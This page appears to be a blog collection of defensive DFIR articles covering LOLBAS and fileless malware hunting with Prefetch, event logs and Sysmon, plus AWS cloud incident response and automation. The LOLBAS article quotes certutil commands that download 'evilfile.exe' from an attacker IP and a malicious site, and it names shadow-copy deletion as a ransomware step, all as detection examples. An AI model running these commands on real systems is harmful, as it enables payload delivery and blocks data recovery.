this guide has provided a clear pathway for setting up and running Volatility 3 on both Windows and WSL, empowering you to optimize your forensic workflows. Now, you might wonder: "I’ve given the commands for running Volatility 3 on Windows—what about WSL?" The good news is that the commands remain the same for WSL, as the underlying process is the same; only the environment differs. In upcoming articles, I’ll cover tools like MemProcFS, Strings, and how to perform comprehensive memory analysis using all three. Until then, happy hunting and keep learning! 👋 Akash Patel

  • Fileless Malware || LOLBAS || LOLBAS Hunting Using Prefetch, Event Logs, and Sysmon

    Fileless malware refers to malicious software that does not rely on traditional executable files on the filesystem , but it is important to emphasize that " fileless" does not equate to "artifactless." Evidence of such attacks often exists in various forms across the disk and system memory, making it crucial for Digital Forensics and Incident Response (DFIR) specialists to know where to look. Key Locations for Artifact Discovery Even in fileless malware attacks, traces can be found in several places: Evidence of execution:  Prefetch, Shimcache, and AppCompatCache Registry keys:  Large binary data or encoded PowerShell commands. Event logs:  Process creation, service creation, and Task Scheduler events. PowerShell artifacts:  PowerShell transcripts and PSReadLine Scheduled Tasks:  Attackers may schedule malicious tasks to persist. Autorun/Startup keys WMI Event Consumers:  These can be exploited to run malicious code without leaving typical executable trace s. Example 1: DLL Side-Loading with PlugX DLL side-loading is a stealthy technique used by malware like PlugX , where legitimate software is abused to load malicious DLLs into memory. The typical attack steps involve: Phishing email : The attacker sends a phishing email to the victim. Decoy file and dropper : The victim opens a l egitimate-looking file (e.g., a spreadsheet) that also delivers the payload. Dropper execution : A dropper executable (e.g., ews.exe) is saved to disk, dropping several files. One of these, oinfop11.exe, is a legitimate part of Office 2003, making it appear trusted . Malicious DLL injection : The legitimate executable loads a spoofed DLL (oinfo11.ocx), which decrypts and activates the actual malware. At this point, the malicious DLL operates in the memory space of a trusted program, evading traditional detection mechanisms. Example 2: Registry Key Abuse In another example, attackers may modify the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run  registry key . This key can be used to launch PowerShell scripts via Windows Script Host (WSH), enabling the attacker to execute code every time the system boots up. Example 3: WMI Event Filters and Fake Updaters Attackers often leverage WMI  (Windows Management Instrumentation) to create event filters that trigger malicious activities, such as launching a fake updater. In this scenario: WMI  uses regsvr32.exe to call out to a malicious site. The malicious site hosts additional malware files, furthering the attack. Living Off the Land (LOLBAS) Attacks Living Off the Land Binaries and Scripts ( LOLBAS)  refer to legitimate tools and binaries that attackers exploit for malicious purposes , reducing the need to introduce new files to the system. This approach makes detection more challenging since the binaries are usually trusted system files. The LOLBAS Project The LOLBAS Project  on GitHub compiles data on legitimate Windows binaries and scripts that can be weaponized by attackers. The project categorizes these tools based on their functions, including: https://gtfobins.github.io/ https://lolbas-project.github.io/ Alternate Data Streams (ADS)  manipulation AWL bypasses  (e.g., bypassing AppLocker) Credential dumping  and code compilation Reconnaissance  and UAC bypasses Common LOLBAS in Use Several Windows binaries are frequently misused in the wild: CertUtil.exe Regsvr32.exe RunDLL32.exe ntdsutil.exe Diskshadow.exe Example: CertUtil Misuse An example of CertUtil.exe  being misused involves downloading a file from a remote server. The command used is: certutil.exe -urlcache -split -f http[:]//192.168.182.129[:]8000/evilfile.exe goodfile.exe Several detection points exist here: Command-line arguments : Detect unusual arguments like urlcache using Event ID 4688 (Windows) or Sysmon Event ID 1 . File creation : Detect CertUtil writing to disk using Sysmon Event ID 11 or endpoint detection and response (EDR) solutions. Network activity : CertUtil making network connections on non-standard HTTPS ports is unusual and should be flagged . ---------------------------------------------------------------------------------------------- 1. Hunting LOLBAS Execution with Prefetch LOLBAS (Living Off the Land Binaries and Scripts) refers to the use of legitimate binaries, often pre-installed on Windows systems , that attackers can misuse for malicious purposes. Tools like CertUtil.exe, Regsvr32.exe, and PowerShell  are frequently used in these attacks. Hunting for these within enterprise environments requires collecting data from various sources such as prefetch files, event logs, and process data. Prefetch Hunting Tips : Prefetch data  is stored in the C:\Windows\Prefetch folde r and provides insight into recently executed binaries. Velociraptor  is a great tool for collecting and analyzing prefetch files across an enterprise environment. Running a regex search for specific LOLBAS tools such as sdelete.exe, certutil.exe, or taskkill.ex e can help narrow down suspicious executions. To perform a regex search using Velociraptor: Step 1 : Collect prefetch files. Step 2 : Apply regex filters to search for known LOLBAS tools. Key Considerations : Prefetch hunting can be noisy due to legitimate execution of trusted binaries. Analyze paths  used by the binaries. For example, C:\Windows\System32\spool\drivers\color\ is commonly abused due to its write permissions. Look for rarely seen executables or unusual paths that might indicate lateral movement or privilege escalation. 2. Intelligence Gathering: Suspicious Emails and Threat Hunts When a suspicious email is reported, especially after an initial compromise: SOC actions : SOC analysts may update email filters, remove copies from the mailserver, but must also hunt across endpoints for signs of delivery. U sing the SHA1 hash  of the malicious file can help locate copies on other endpoints. For example : you can use Velociraptor with Generic.Forensic.LocalHashes.Init  to build a hash database, and then populate it with GenericForensic.LocalHashes.Glob. 3. Endpoint Data Hunting Key areas for LOLBAS detection on endpoints: Prefetch Files : As mentioned, rarely used executables like CertUtil or Regsvr32  may signal LOLBAS activity. Running Processes : Collect processes from all endpoints. Uncommon processes, especially those tied to known LOLBAS binaries, should be investigated. 4. SIEM and Event Log Analysis Event logs and SIEM tools offer key visibility for LOLBAS detection: Sysmon Event 1 (Process Creation) : Captures process creation events and contains critical information like command-line arguments and file hashes. Windows Security Event 4688 : This event captures process creation events , and when paired with Event 4689  (process termination ), it provides complete context for process lifetime, which can be useful in detecting LOLBAS activity. Common LOLBAS Detection via Event Logs : CertUtil.exe : Detect by filtering for the user agent string Microsoft-CryptoAPI/*. PowerShell : Detect suspicious PowerShell execution using its user agent string: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.610 Microsoft BITS/* – BITS ----------------------------------------------------------------------------------------------------------- 1. Hunting Process Creation Events with Sysmon (Event ID 1) Sysmon's Event ID 1  (Process Creation) is a critical log for detecting Living Off the Land Binaries and Scripts (LOLBAS) attacks, as it provides detailed information about processes that are started on endpoints. However, since LOLBAS attacks often use legitimate, signed executables, it's essential to look beyond basic indicators like file hashes. Key information from Sysmon Event ID 1  includes: Process Hash : While helpful for detecting malicious software, it is less useful for LOLBAS because the executables involved are usually Microsoft-signed binaries, which are seen as legitimate. Parent Command Line : The parent process command line can be very informative in some situations, especially when exploring more advanced attack chains. However, for many LOLBAS hunts, it might just indicate cmd.exe or explorer.exe, which are often used as the parent processes in these attacks. 2. Windows Security Event 4688 (Process Creation) Windows Security Event 4688  is another valuable source for capturing process creation data. For LOLBAS hunting, focusing on a few key fields in Event 4688 is particularly useful: Parent Process : Although often cmd.exe or explorer.exe , this information can reveal if the process was initiated by a legitimate GUI or a script , or if it was spawned by a more suspicious process like w3wp.exe (IIS) running CertUtil.exe. If the parent process is something like IIS or a PowerShell script , it suggests automation or an attack executed remotely (e.g., via a webshell). Process Command Line : This is critical because it includes any arguments passed to the executable . In LOLBAS attacks, unusual command-line switches or paths used by trusted binaries (like CertUtil.exe -urlcache) can reveal malicious intent. Token Elevation Type : %%1936 : Full token with all privileges, suggesting no UAC restriction . %%1937 : Elevated privileges, indicating that a user has explicitly run the application with “Run as Administrator.” %%1938 : Normal user privileges. These indicators are helpful to see if the binary was executed with elevated permissions , which could hint at privilege escalation attempts. 3. Windows Firewall Event Logs for LOLBAS Detection Firewalls can provide additional information about LOLBAS activities , particularly in relation to network-based attacks . Event logs such as 5156  (allowed connection) or 5158  (port binding) can help spot outbound connections initiated by LOLBAS binaries like CertUtil.exe or Bitsadmin.exe. Key fields in firewall logs: Process ID/Application Name : This tells you which binary initiated the network connection. Tracking legitimate but rarely used binaries (e.g., CertUtil) making outbound connections to unusual IP addresses can indicate an attack. Destination IP Address : Correlating this with known good IPs or threat intelligence data is critical to confirm whether the connection is benign or suspicious. 4. Event Log Analysis for LOLBAS For deeper LOLBAS detection, multiple event logs should be analyzed together: 4688 : Logs the start of a process (the key event for initial execution detection). 4689 : Logs the end of a process , providing insights into how long the process was running and whether it completed successfully. 5156 and 5158 : Track firewall events, focusing on port binding and outbound connections. Any outbound traffic initiated by unusual executables like Bitsadmin.exe or CertUtil.exe should be scrutinized. 5. Detecting Ransomware Precursors with LOLBAS Many ransomware attacks involve the use of LOLBAS commands to weaken defenses or prepare the environment for encryption: Disabling security tools : Commands like taskkill.exe or net stop are used to terminate processes that protect the system . Firewall/ACL modifications : netsh.exe might be used to modify firewall rules to allow external connections. Taking ownership of files : This ensures the ransomware can encrypt files unhindered. Disabling backups/Volume Shadow Copies : Commands like vssadmin.exe delete shadows are common to prevent file recovery. Since these activities often involve legitimate system tools, auditing these actions can serve as an early warning. 6. Improving Detection with Windows Auditing For better detection of LOLBAS attacks and ransomware precursors, implement the following Windows auditing  settings: Process Creation Auditing : Auditpol /set /subcategory:"Process Creation" /success:enable /failure:enable This ensures that every process creation event is logged, which is crucial for identifying LOLBAS activity. Command Line Auditing : reg add "hklm\software\microsoft\windows\currentversion\policies\system\audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 Enabling command-line logging is crucial because LOLBAS binaries often need unusual arguments to perform malicious actions. PowerShell Logging : reg add "hklm\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging" /v EnableModuleLogging /t REG_DWORD /d 1 reg add "hklm\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" /v EnableScriptBlockLogging /t REG_DWORD /d 1 PowerShell script block logging captures the full content of commands executed within PowerShell, which is a key LOLBAS tool used for various attacks. 7. Sysmon: Enhanced Visibility for LOLBAS Deploying Sysmon  enhances your visibility into system activities, especially for LOLBAS detection: File Hashes : Sysmon captures the hash of the executing file , which is less helpful for LOLBAS as these files are usually legitimate. However, the combination of the file hash with process execution data can still provide context. Process Command Line : Sysmon logs detailed command-line arguments, which are crucial for spotting LOLBAS attacks . The presence of rarely used switches or network connections from unexpected binaries is a red flag. Because Sysmon captures more detailed process creation data than Windows Security Events, it’s a preferred tool for more advanced hunting, especially when dealing with stealthy attacks involving LOLBAS tools. 8. Sigma Rules for LOLBAS Detection Sigma rules provide a framework for creating reusable detection logic that can work across different platforms and SIEM solutions. Using Sigma, you can write detection logic in a human-readable format and then convert it into SIEM-specific queries using tools like Uncoder.io . Advantages of Sigma : Detection logic is SIEM-agnostic . This allows you to use the same detection rules even if your organization switches SIEM platforms. Sigma rules can be easily integrated with Sysmon , Windows Security Events , and other logging tools, making them highly adaptable. By using Sigma for LOLBAS detection, you ensure consistent alerts across all environments. 9. Practical Example of LOLBAS Detection: CertUtil Here’s an example of how CertUtil.exe  might be used in an attack: certutil.exe -urlcache -split -f http[:]//malicious-site[.]com/evilfile.exe goodfile.exe This command downloads a file from a remote server and stores it on the local system. While CertUtil  is a legitimate Windows tool for managing certificates, it can be misused for file downloads. Sysmon Event 1 : You would capture the process command line   and see the -urlcache argument, which is rare in normal usage. Firewall Event 5156 : Logs the connection attempt from CertUtil.exe   to the malicious IP. Security Event 4688 : Logs the creation of CertUtil.exe , providing the process ID and command-line arguments. Conclusion: Effectively hunting LOLBAS and fileless malware requires a combination of detailed event logging, process monitoring, prefetch analysis, and centralized log management. By leveraging tools like Sysmon , Velociraptor , and Sigma, organizations can strengthen their detection capabilities and proactively defend against stealthy attacks that rely on legitimate system tools to evade traditional security measures. Akash Patel

  • Leveraging Automation in AWS for Digital Forensics and Incident Response

    For those of us working in digital forensics  and incident response (DFIR) , keeping up with the cloud revolution can feel overwhelming at times. We're experts in tracking down security incidents and understanding what went wrong, but many of us aren't DevOps engineers  by trade. That’s okay—it’s not necessary to become a full-time cloud architect to take advantage of the powerful automation tools  and workflows available in platforms like AWS . Instead, we can collaborate with engineers and developers who specialize in these areas to create effective, scalable solutions that align with our needs. ----------------------------------------------------------------------------------------------------------- Getting Started with Cloud-Based Forensics For those who are new to the cloud or want a quick start to cloud forensics, A mazon Machine Images (AMIs)  are a great option. AMIs are pre-configured templates that contain the information required to launch an instance . If you’re not yet ready to build your own custom AMI, there are existing ones you can use. SIFT (SANS Investigative Forensic Toolkit)  is a popular option for forensics analysis and is available as an AMI. While it’s not listed on the official AWS Marketplace, you can find the latest AMI IDs on the github page and launch them from the EC2 console. https://github.com/teamdfir/sift#aws Security Onion  is another robust tool for network monitoring and intrusion detection. They publish their releases as AMIs, although there’s a small charge to cover regular update services. If you want full control, you can build your own AMI from their free distribution. As your team grows in its cloud forensics capabilities, you may want to create custom AMIs  to fit specific use cases . EC2 Image Builder  is a helpful AWS service that makes it easy to create and update AMIs, complete with patches and any necessary updates. This ensures that you always have a reliable, up-to-date image for your incident response efforts. ----------------------------------------------------------------------------------------------------------- Infrastructure-as-Code: A Scalable Approach to Forensics Environments As your organization expands its cloud infrastructure, it's essential to deploy forensics environments quickly and consistently. This is where Infrastructure-as-Code (IaC)  comes into play. IaC allows you to define and manage your cloud resources using code, making environments easily repeatable and reducing the risk of configuration drift. One of the key principles of IaC is idempotence . This means that, no matter the current state of your environment, running the IaC script will bring everything to the desired state. This makes it easier to ensure that forensic environments are deployed consistently and accurately every time. ----------------------------------------------------------------------------------------------------------- CloudFormation and Terraform A WS provides its own IaC tool called CloudFormation , which uses JSON  or YAML  files to define and automate resource configurations . AWS also offers CloudFormation templates  for various use cases, including incident response workflows. These templates can be adapted to fit your specific needs, making it easy to set up response environments quickly. You can explore some ready-to-use templates. https://aws.amazon.com/cloudformation/resources/templates/ However, if your organization operates across multiple cloud providers—such as Azure , Google Cloud , or DigitalOcean — you might prefer an agnostic solution like Terraform . Terraform, developed by HashiCorp , allows you to write a single set of scripts that can be applied to various cloud platforms, streamlining deployment across your entire infrastructure. ----------------------------------------------------------------------------------------------------------- Automating Forensic Tasks with AWS Lambda One of the most exciting aspects of cloud-based forensics is the potential for automation , and AWS Lambda  is a key player in this space. Lambda lets you run code without provisioning servers, and it’s event-driven , meaning it automatically executes tasks in response to certain triggers . This is perfect for incident response, where every second counts. https://aws.amazon.com/lambda/faqs/ For example, let’s say you’ve set up a write-only S3 bucket  for triage data. Lambda can be triggered whenever a new file is uploaded, automatically kicking off a series of actions such as running a triage analysis script or notifying your response team. The best part is that you’re only charged for the execution time, not for keeping a server running 24/7. Lambda supports multiple programming languages, including Python , Node.js , Java , Go , Ruby , C# , and PowerShell . This flexibility makes it easy to integrate with existing workflows, no matter what scripting languages you’re comfortable with. https://github.com/awslabs/ ----------------------------------------------------------------------------------------------------------- AWS Step Functions: Orchestrating Complex Workflows While Lambda excels at executing individual tasks, AWS Step Functions  allow you to orchestrate complex, multi-step workflows . In the context of incident response, this means you can automate an entire forensics investigation, from capturing an EC2 snapshot to running analysis scripts and generating reports. One example of a Step Function workflow comes from the AWS Labs  project titled “EC2 Auto Clean Room Forensics ” . Here’s how the workflow operates: Capture a snapshot  of the target EC2 instance’s volumes. Notify the team via Slack  that the snapshot is complete. Isolate  the compromised EC2 instance. Create a pristine analysis instance  and mount the snapshot. Use the AWS Systems Manager (SSM)  agent to run forensic scripts on the instance. Generate a detailed report. Notify the team when the investigation is complete. This kind of automation significantly speeds up the forensic process, allowing your team to focus on higher-level analysis rather than repetitive tasks. ----------------------------------------------------------------------------------------------------------- Other Automation Options for Forensics in the Cloud If you don’t have the resources or time to dive deep into AWS-specific solutions, there are plenty of other automation options available that work across cloud platforms. For instance, dfTimewolf , developed by Google’s IR team , is a Python-based framework designed for automating DFIR workflows. It includes recipes for AWS, Google Cloud Platform (GCP) , and Azure , allowing you to streamline evidence staging and processing across multiple cloud environments. Alternatively, if you’re comfortable with shell scripting  and the AWS CLI , you can develop your own lightweight automation scripts. For example, R econ InfoSec  has released a simple yet powerful project that ingests triage data from S3 and processes it in Timesketch . This is an excellent way to automate data handling without building a complex pipeline from scratch. https://dftimewolf.readthedocs.io/en/latest/developers-guide.html https://libcloud.apache.org/index.html ----------------------------------------------------------------------------------------------------------- The Importance of Practice in Cloud Incident Response Automation can dramatically improve your response times and overall efficiency, but it’s essential to practice these workflows regularly. Cloud technology evolves rapidly, and so do the risks associated with it. By practicing response scenarios—whether using AWS Step Functions , Terraform , or even simple CLI scripts —you can identify gaps in your processes and make improvements before a real incident occurs. AWS also provides several incident response simulations  that allow you to practice responding to real-world scenarios. These are excellent resources to test your workflows and ensure that your team is always ready. ----------------------------------------------------------------------------------------------------------- Conclusion Stay proactive by experimenting with these technologies, practicing regularly, and continuously refining your workflows. Cloud adoption is accelerating, and with it comes the need for robust, automated incident response strategies that can keep up with this evolving landscape Akash Patel

  • Optimizing AWS Cloud Incident Response with Flow Logs, Traffic Mirroring, and Automated Forensics

    When it comes to managing networks—whether on-premise or in the cloud—one of the biggest challenges is understanding what’s happening with your traffic . That's where flow logs  and traffic mirroring  come in . These tools provide essential visibility into network activity, helping with everything from troubleshooting to detecting suspicious behavior. ------------------------------------------------------------------------------------------------------------- Flow Logs: The Call Records of Your Network Think of flow logs as the "call records" of your network. Just like a phone bill shows who called whom, at what time, and for how long, flow logs show similar information but for network traffic. For example, you can track: Which source IP  is communicating with which destination IP Ports  being used Timestamp  of the traffic Volume of data  transferred This level of detail is invaluable for general troubleshooting  and tracking unusual activity  in your network. Flow logs give you a high-level summary, making it easy to see patterns and spot anomalies. ------------------------------------------------------------------------------------------------------------- Storing and Analyzing Flow Logs In AWS, flow logs can be stored in Amazon S3  for archiving or sent to CloudWatch Logs  for real-time analysis . Sending them to CloudWatch gives you the ability to: Query logs directly  for ad-hoc analysis Set up alerts  (e.g., for detecting high bandwidth usage) For more advanced analysis, you can export flow logs to systems like Elasticsearch  or Splunk , where you can take advantage of their powerful search capabilities to dig deeper into network behavior. To get started with flow logs, check out the AWS documentation. https://aws.amazon.com/blogs/aws/learn-from-your-vpc-flow-logs-with-additional-meta-data/ https://docs.aws.amazon.com/vpc/latest/userguide/flow-logs.html ------------------------------------------------------------------------------------------------------------- Traffic Mirroring: Dive into Network Traffic While f low logs provide summaries , traffic mirroring  lets you go a step further by capturing the actual network traffic . This is useful for tasks like network intrusion detection . With traffic mirroring, you can copy traffic from a network interface on an EC2 instance and send it to a monitoring instance, which can be in the same VPC or even in a separate account. This is particularly helpful for security investigations . For instance, during the COVID-19 pandemic, the company CRED  used traffic mirroring to enhance network inspection for employees working from home. Traffic mirroring allows you to: Filter traffic , so you only capture the data you need Send traffic to a dedicated security enclave  for analysis Monitor traffic from multiple locations, even across different AWS accounts If you’re interested in setting this up, AWS has a helpful guide.. https://docs.aws.amazon.com/vpc/latest/mirroring/what-is-traffic-mirroring.html ------------------------------------------------------------------------------------------------------------- Cloud Incident Response: Why It’s Different and How to Prepare One of the golden rules of incident response (IR)  in the cloud is simple: Go to where the data is . Investigating incidents directly in the cloud offers significant advantages: Faster access  to data Scalable computing resources  for analyzing large datasets Built-in automation  tools to speed up the investigation But to make the most of these benefits, you need to plan ahead . For example, ensure that your security team has access to cloud assets before an incident occurs . This avoids delays in gathering the necessary data when time is of the essence. ------------------------------------------------------------------------------------------------------------- Gaining Access to Cloud Assets Getting access to cloud data for incident response can be challenging if not properly planned. At a minimum, your s ecurity team should have direct communication lines with cloud administrators to quickly gain access. However, it’s b etter to set up federated authentication  so the security team can assume roles in AWS accounts as needed. Tools like AWS Organizations  can help manage access and ensure consistent logging across accounts. Read more about preparing for cloud incidents. https://docs.aws.amazon.com/whitepapers/latest/aws-security-incident-response-guide/aws-security-incident-response-guide.html ------------------------------------------------------------------------------------------------------------- Using the Cloud to Build Incident Response Labs One of the exciting possibilities of using cloud infrastructure for incident response is the ability to quickly spin up investigative labs . In a cloud environment, you can: Scale analysis hosts  on demand Quickly access network and host data Create security enclaves  (i.e., isolated AWS accounts) for storing and analyzing sensitive information AWS Control Tower offers a framework for organizing and managing these security accounts, which act as a boundary to protect data from potential intruders in production accounts. You can even create forensic accounts  specifically for investigating incidents. Additionally, tools like Velociraptor are useful for triaging data and live analysis , even in the cloud. Building out these capabilities in the cloud enables you to respond more efficiently to incidents while reducing risk. For more information, check out AWS’s guidance on forensic investigation strategies. https://docs.aws.amazon.com/prescriptive-guidance/latest/designing-control-tower-landing-zone/introduction.html ------------------------------------------------------------------------------------------------------------- When it comes to incident response (IR)  in the cloud, especially with AWS, having the right security accounts  and forensic tools  in place is essential for efficient investigations. Cloud-based incidents often involve extensive log analysis , which can be complex given the various ways AWS stores and manages logs . Additionally, dealing with network forensic s in environments using VPCs  and EC2 instances  requires preparation with tools for both disk-based  and network-based analysis . Accessing Logs for Cloud Investigations One of the main challenges in cloud incident response is accessing and analyzing logs . Logs can be stored in various formats and locations within AWS. For example: VPC flow logs  might be archived in S3 buckets  or sent to CloudWatch  for real-time processing. Organizations may centralize logs in dedicated log archive accounts  or aggregate them into a security account for streamlined access. When preparing your environment, create a clear logging architecture  across all accounts, ensuring read-only access  to critical logs . This allows your security team to quickly access the data without worrying about unauthorized modifications. Additionally, you may configure a security account  to subscribe to logs from other accounts via CloudWatch . This can centralize log management, allowing custom views and integration with SIEM tools for better incident tracking. However, be mindful of potential costs and redundancy if logs are already being stored elsewhere. ------------------------------------------------------------------------------------------------------------- Capturing Network Data: VPC Traffic Mirroring and PCAP If your organization uses VPCs  and EC2 instances , VPC traffic mirroring  is a critical tool for capturing network traffic  in real-time . This feature can provide PCAP  data , which is often pivotal in identifying and analyzing suspicious network behavior . By setting up traffic mirroring, you can send real-time network data to your analysis environment, ensuring that no important traffic is missed during an investigation. F orensic readiness in AWS also includes using Elastic Block Storage (EBS)  snapshots to capture disk images. Snapshots are quick and easy to create, allowing you to preserve the state of an EC2 instance at a specific moment in time . These snapshots can be shared with your security account for further analysis. Be sure that your team has access to the relevant encryption keys  if the EBS volume is encrypted. ------------------------------------------------------------------------------------------------------------- Ensuring Secure and Compliant Data Handling When dealing with sensitive data, security and compliance are paramount. For example: Use S3 Object Lock  to make logs immutable , preventing them from being altered or deleted during an investigation. Enable S3 Versioning  to keep track of changes and allow easy recovery of previous versions. Implement MFA Delete  to enforce multi-factor authentication before any versions can be deleted, adding an extra layer of protection. For long-term storage, S3 Glacier  offers a cost-effective solution for storing logs and forensic data, while still providing the flexibility to retrieve data when needed. ------------------------------------------------------------------------------------------------------------- Deploying Security Tools Across AWS Regions One of the unique aspects of working in AWS is the ability to deploy resources across different regions. Since AWS has 25+ regions , ensure that your security tools  can be easily deployed wherever your company operates. This is important for: Speed : It may be quicker to access data from the same region where it was generated rather than transferring it across regions. Cost : Cross-region data transfers incur additional fees, so keeping analysis local can save money. Compliance : In some cases, privacy laws may restrict moving data across national borders, even within AWS. Deploying clean instances  of your security tooling in each region ensures you can respond quickly without jurisdictional or logistical hurdles. ------------------------------------------------------------------------------------------------------------- Secure Communications During Incident Response During an incident, secure communication is critical . Advanced attackers have been known to monitor security teams, so ensure you have a secure communication plan  in place. This could involve using dedicated cloud resources  outside your usual business channels to avoid being compromised during critical moments. Whether hosted on AWS or another provider, the key is to have a secure, well-thought-out system in place before an incident occurs. ------------------------------------------------------------------------------------------------------------- Automating Triage and Evidence Collection Automation plays a vital role in speeding up incident response. AWS Systems Manager (SSM)  is a powerful tool for automating tasks , such as running triage scripts or gathering evidence from EC2 instances. The SSM agent , commonly installed on AWS hosts, can also be used on-premise or in other cloud environments, providing flexibility across different systems. For example, incident responders can use the SSM agent to attach a shared EBS volume  to a running EC2 instance, capturing volatile memory or other critical data without using privileged accounts. This minimizes risk and ensures evidence is collected efficiently. AWS also provides a range of automation scripts that leverage Systems Manager  to extract data for later analysis, significantly improving response times during an incident. ------------------------------------------------------------------------------------------------------------- Practice and Plan for Incident Response Just as in sports, the key to successful incident response is practice. A WS offers incident simulation scenarios  to help teams prepare for real-world situations . These simulations help identify gaps in your plan and provide opportunities to optimize processes. By regularly practicing these scenarios, your team can improve their confidence and ability to handle incidents effectively. ----------------------------------------------------------------------------------------------------- Conclusion Building an efficient incident response strategy in AWS requires a combination of planning , tooling , and automation . By leveraging AWS features like flow logs , VPC traffic mirroring , and EBS snapshots , security teams can gain deep visibility into both network and disk activity. Automation tools, such as AWS Systems Manager , further enhance the response by simplifying evidence collection and triage Akash Patel

bottom of page